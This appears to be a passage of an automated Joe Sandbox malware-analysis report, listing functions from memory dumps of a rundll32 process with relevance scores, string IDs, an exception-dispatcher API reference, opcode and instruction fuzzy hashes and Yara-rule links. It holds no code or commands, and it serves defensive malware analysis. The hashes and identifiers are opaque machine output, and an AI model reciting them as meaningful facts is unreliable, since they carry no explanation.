                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: e259cf0320ee28519e1e56fe8475fb9668ab8898a7069db237f59499fa5a9295
                                                                                                                                                                                                                                                                                                • Instruction ID: dc7002a2ac09d81378d70e574fc4c893b34eea2bba823a279fb100d4f480f145
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e259cf0320ee28519e1e56fe8475fb9668ab8898a7069db237f59499fa5a9295
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5C1AE70B102158FEB64DF69C45492EBBE6BFC8314B248469E446DB3A4DF34EC41CB91
                                                                                                                                                                                                                                                                                                Function 06F9E1F0 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (Apq
                                                                                                                                                                                                                                                                                                • API String ID: 0-1034389350
                                                                                                                                                                                                                                                                                                • Opcode ID: 897f1186adeb2d9ed46ab32f2bcc96f427f6e0d0a1fc1ce2f3ad662c4dfae8b4
                                                                                                                                                                                                                                                                                                • Instruction ID: 5c49c43e698e56ff1c58409e85f3f10acc55b8dc9b698e8dd0000dc7180199af
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 897f1186adeb2d9ed46ab32f2bcc96f427f6e0d0a1fc1ce2f3ad662c4dfae8b4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4FC15C70F102198FEF54DFA9C954AAEBBB6BF88200F144129D402EB394DB74DC46CBA1
                                                                                                                                                                                                                                                                                                Function 06F999B8 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: daadad48ae7805790b9bde59ce44096eef4c8424ebbe6786be0660b4e8366d6c
                                                                                                                                                                                                                                                                                                • Instruction ID: 5ce3513981af578b35f45bb9d984eb3d2ba89568ffb4e4093159b55063c8b953
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: daadad48ae7805790b9bde59ce44096eef4c8424ebbe6786be0660b4e8366d6c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0E11834E003598FDB45DF68C884A9DBBF2BF89300F198199D809AB365DB74ED45CBA0
                                                                                                                                                                                                                                                                                                Function 07079FE0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 07079FF8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698644470.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7070000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 6842923-0
                                                                                                                                                                                                                                                                                                • Opcode ID: bd42d1110e2ce898158c61bbb29a76e79bcc462a55d215fa5bcea3529b423992
                                                                                                                                                                                                                                                                                                • Instruction ID: dad60de13cebbecdfeb39ced4cdfdbf8c3c511e5e0c3ce3c997116260ea2f5bc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd42d1110e2ce898158c61bbb29a76e79bcc462a55d215fa5bcea3529b423992
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7113AB5F012058FDB108A7CD4407DDB7E1EB89325F14CB25D525D3290EA36A918CBD4
                                                                                                                                                                                                                                                                                                Function 07079FD0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 07079FF8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698644470.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7070000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 6842923-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c1431c88aebde6ec94ad1c80db0eada8c50b50b1d79d774568869301d0e22bbe
                                                                                                                                                                                                                                                                                                • Instruction ID: 511b1451f896dbd010e1fce360e0bbc119a1da708d71c37c6539e8e3de16920a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1431c88aebde6ec94ad1c80db0eada8c50b50b1d79d774568869301d0e22bbe
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B01135F1E012469FDB10CA38C4447EDBBE2EB45325F24CB14D911A3190EB35A908CBD4
                                                                                                                                                                                                                                                                                                Function 06F91080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: 5837d6f7955128b7efef8bafdc56c769cbef3c0a0d6aba010d9ab2461db56637
                                                                                                                                                                                                                                                                                                • Instruction ID: 4dcc641365b609df973fa92572307201cf5ca1e15044d714d4a56fd57c57a96f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5837d6f7955128b7efef8bafdc56c769cbef3c0a0d6aba010d9ab2461db56637
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8718235F002159FEF54EBB5C854A6EB6A7EFC8300F148079E506AB3A4DE35DC528BA0
                                                                                                                                                                                                                                                                                                Function 06F96048 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: 3c4b2ddc1376dc00eb01fd7a7ee504bd290e5f443462d93dcae197f4e1001a20
                                                                                                                                                                                                                                                                                                • Instruction ID: ddc58af76b521f8a1eb58c6065379dcc35c0a1554c578ff3d369ddf13c008032
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c4b2ddc1376dc00eb01fd7a7ee504bd290e5f443462d93dcae197f4e1001a20
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E717B70A003189FDB05EBE8C8A06DEBFB2FF89310F108529D516677A4DE356D46DB91
                                                                                                                                                                                                                                                                                                Function 06F968E0 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: 7b5065c52cd28088971cb013b354a5aacddfd32b3ddc12510e0cfd7fd86ee899
                                                                                                                                                                                                                                                                                                • Instruction ID: 67c0dcede39b7c712dc1312bcea1893f42d4178af6e3a494fbc293ee8a54dd8f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b5065c52cd28088971cb013b354a5aacddfd32b3ddc12510e0cfd7fd86ee899
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73615C3AB002059FDB51CF69C88099ABBF6FF8D31071581AAE509DB321DB31ED15CB90
                                                                                                                                                                                                                                                                                                Function 06F90C1C Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: efd3f11a35c5e69e33c9119047820c54d506a48cc07b8fafe6b68f409e56a6ea
                                                                                                                                                                                                                                                                                                • Instruction ID: 987ca1791f88abffa3c04a775a0f70523f242f2b146f920d8971253022cbfbba
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efd3f11a35c5e69e33c9119047820c54d506a48cc07b8fafe6b68f409e56a6ea
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3951E031A04255AFEB58DB78D8147AA7BB6EFC9310F14806AE406E73C5CE799C05C7B1
                                                                                                                                                                                                                                                                                                Function 06F90E8C Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: 32e97a829766455bbdd922524cb0071007cabc795cc04c2bd211d92dea939e72
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a66713c62d2b663de50e539fdd9e4c36d6d1514d5640be44ce4b4f481acb679
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32e97a829766455bbdd922524cb0071007cabc795cc04c2bd211d92dea939e72
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B041D432B101156BFB98AA699C64B6F7B9BDFC4610F14803DE906AB3C0CE359D0687F4
                                                                                                                                                                                                                                                                                                Function 06F9C4D8 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: 5fa58cbeb7aa668b558ed91c6b8921942aed47ac42e3db42f260875c9f3e5b94
                                                                                                                                                                                                                                                                                                • Instruction ID: ce0dc79d39b8f18503951d794c1c6671b20f32ac461065de143ba776d64e8700
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fa58cbeb7aa668b558ed91c6b8921942aed47ac42e3db42f260875c9f3e5b94
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E851D6317047418FD725DB38D55492AFBE2EFC6300719C6A9D48A8B765DE34EC06CBA0
                                                                                                                                                                                                                                                                                                Function 06F9E428 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (Apq
                                                                                                                                                                                                                                                                                                • API String ID: 0-1034389350
                                                                                                                                                                                                                                                                                                • Opcode ID: b0ecb3ecceecd9b80e15e08669dc9d847d0bdf661d9b716c414fbcb9869009e5
                                                                                                                                                                                                                                                                                                • Instruction ID: 4e14e18b97198036e7b063af8f8e78f3d03c4d94d9cccee3a159b216417128f6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0ecb3ecceecd9b80e15e08669dc9d847d0bdf661d9b716c414fbcb9869009e5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB416C70F102159FEB54EF69D954AAEB7F6BF88204B104129D816EB394EF74EC01CBA1
                                                                                                                                                                                                                                                                                                Function 06F9EA88 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: c335f0daa8b2d6580c1cd3d0b6599940bfc9a4ad633986b1d686cfb2173daac1
                                                                                                                                                                                                                                                                                                • Instruction ID: 876932253bd15bd59c8d0d350f2c18ed746f575145a0903cb6f3dc6452fd7827
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c335f0daa8b2d6580c1cd3d0b6599940bfc9a4ad633986b1d686cfb2173daac1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2731CE71B002168FEB48DE7DC45096FBBE6EFC96207154179E806CB3A0EE34EC058BA1
                                                                                                                                                                                                                                                                                                Function 06F985B0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: 379091fdc6b118ac2cca40340400fd1c4fc7b6cf53c6f9f6178b7e42b34c3ca6
                                                                                                                                                                                                                                                                                                • Instruction ID: 5ff485d5c9904f32297c074385343e1c6ff5d1ec7275eb768c60a833b9cff909
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 379091fdc6b118ac2cca40340400fd1c4fc7b6cf53c6f9f6178b7e42b34c3ca6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69415C34B006058FDB54CF19C48096ABBF2FF8A354B158969D466AB361DB34EC41CF60
                                                                                                                                                                                                                                                                                                Function 06F93719 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: LRkq
                                                                                                                                                                                                                                                                                                • API String ID: 0-1052062081
                                                                                                                                                                                                                                                                                                • Opcode ID: eb4aa9a3ed15c02d827c564ffcea05f06a36ba277b0a7a00f1c1c0450c0e528f
                                                                                                                                                                                                                                                                                                • Instruction ID: cf1ffe34c38011137adb3cfb2810984434f145d5116df797f974e4a51cdc3e21
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb4aa9a3ed15c02d827c564ffcea05f06a36ba277b0a7a00f1c1c0450c0e528f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD21D372F082559FEF98CA359C4877F7BAAEFC5108F14406EE446C7295EB349D0187A1
                                                                                                                                                                                                                                                                                                Function 06F945C8 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: 6c2a2819c85bc0a897a562a0b68cae8ee38cb5db3fa10b2acdfa68ce1c60dc80
                                                                                                                                                                                                                                                                                                • Instruction ID: 14fc0aeb74e00726d330809a47177c7b9d080e7e34917166c34096c5d960e10a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c2a2819c85bc0a897a562a0b68cae8ee38cb5db3fa10b2acdfa68ce1c60dc80
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9521D3357002059FEB54DB6DD84492ABBEBEFDA31071540A9E109DB365DE35EC06C7A0
                                                                                                                                                                                                                                                                                                Function 06F9AAA7 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: k
                                                                                                                                                                                                                                                                                                • API String ID: 0-140662621
                                                                                                                                                                                                                                                                                                • Opcode ID: 316bbd309e3e52d2e4c549918f0c35b284b206886d6865c078eb5f83ce2624af
                                                                                                                                                                                                                                                                                                • Instruction ID: 4ae75230a5a1df0a22b7da36102a1b9c7908e53f96745f616c58a6f25b6eb811
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 316bbd309e3e52d2e4c549918f0c35b284b206886d6865c078eb5f83ce2624af
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6219130D053899FDF41EFA8D8505ADBFB1AF89310F0000DAD441AB366DA34AA44CB92
                                                                                                                                                                                                                                                                                                Function 06F9AF10 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: \;kq
                                                                                                                                                                                                                                                                                                • API String ID: 0-699045553
                                                                                                                                                                                                                                                                                                • Opcode ID: 8249eba55ff56763a88e9e5ae19e8c5c56f89e8327c273f88f0977c742057577
                                                                                                                                                                                                                                                                                                • Instruction ID: 57997c2797601c8b28152fbda80afe880fd8ffa0f5c086b7475bcf40615a8c16
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8249eba55ff56763a88e9e5ae19e8c5c56f89e8327c273f88f0977c742057577
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 281186327042054F9B549BAEA49495BF7DAEFC826C715803BF50EC7759EE75EC0143A0
                                                                                                                                                                                                                                                                                                Function 06F95F48 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: LRkq
                                                                                                                                                                                                                                                                                                • API String ID: 0-1052062081
                                                                                                                                                                                                                                                                                                • Opcode ID: 3dd95944dfc22c101d49d666f55c47d9c344f96677b116066a6da232e772ed5a
                                                                                                                                                                                                                                                                                                • Instruction ID: aa2101643f7001fd377ad7f92aabb8f7e720694ecc3561e7690f8112f796a79c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3dd95944dfc22c101d49d666f55c47d9c344f96677b116066a6da232e772ed5a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76218435B101149FEB589B69C455AAEBBF6EF8C614F118059E502EB3A0DE75AC00CFE0
                                                                                                                                                                                                                                                                                                Function 06F95F46 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: LRkq
                                                                                                                                                                                                                                                                                                • API String ID: 0-1052062081
                                                                                                                                                                                                                                                                                                • Opcode ID: 57f5d7212605f75a0f60b936141ceb268cfe9f4e3c22ae902e1325e7db1027e5
                                                                                                                                                                                                                                                                                                • Instruction ID: 73241f97590d2467eebf0d91bbbe871cc93b6a5d1f8191442dc29e9e49fed878
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 57f5d7212605f75a0f60b936141ceb268cfe9f4e3c22ae902e1325e7db1027e5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F219331B101149FEB589F69C459AAE7BF6EF8C614F118019E502EB3A0DE75AC00CFE0
                                                                                                                                                                                                                                                                                                Function 06F93370 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: fpq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3306291180
                                                                                                                                                                                                                                                                                                • Opcode ID: 11cebd868593518413c729d7bd41ebf72b7f99982738350779bf677503a8fb59
                                                                                                                                                                                                                                                                                                • Instruction ID: 4cfff9eda837d063aa4aeacec0c6824b545e02088c24a9ad2ecc7d24b109c8e0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11cebd868593518413c729d7bd41ebf72b7f99982738350779bf677503a8fb59
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7118675B00115AFDB199FB494595BFBFBAFBC8700B11802AF905D7240DE389D028BE0
                                                                                                                                                                                                                                                                                                Function 06F93380 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: fpq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3306291180
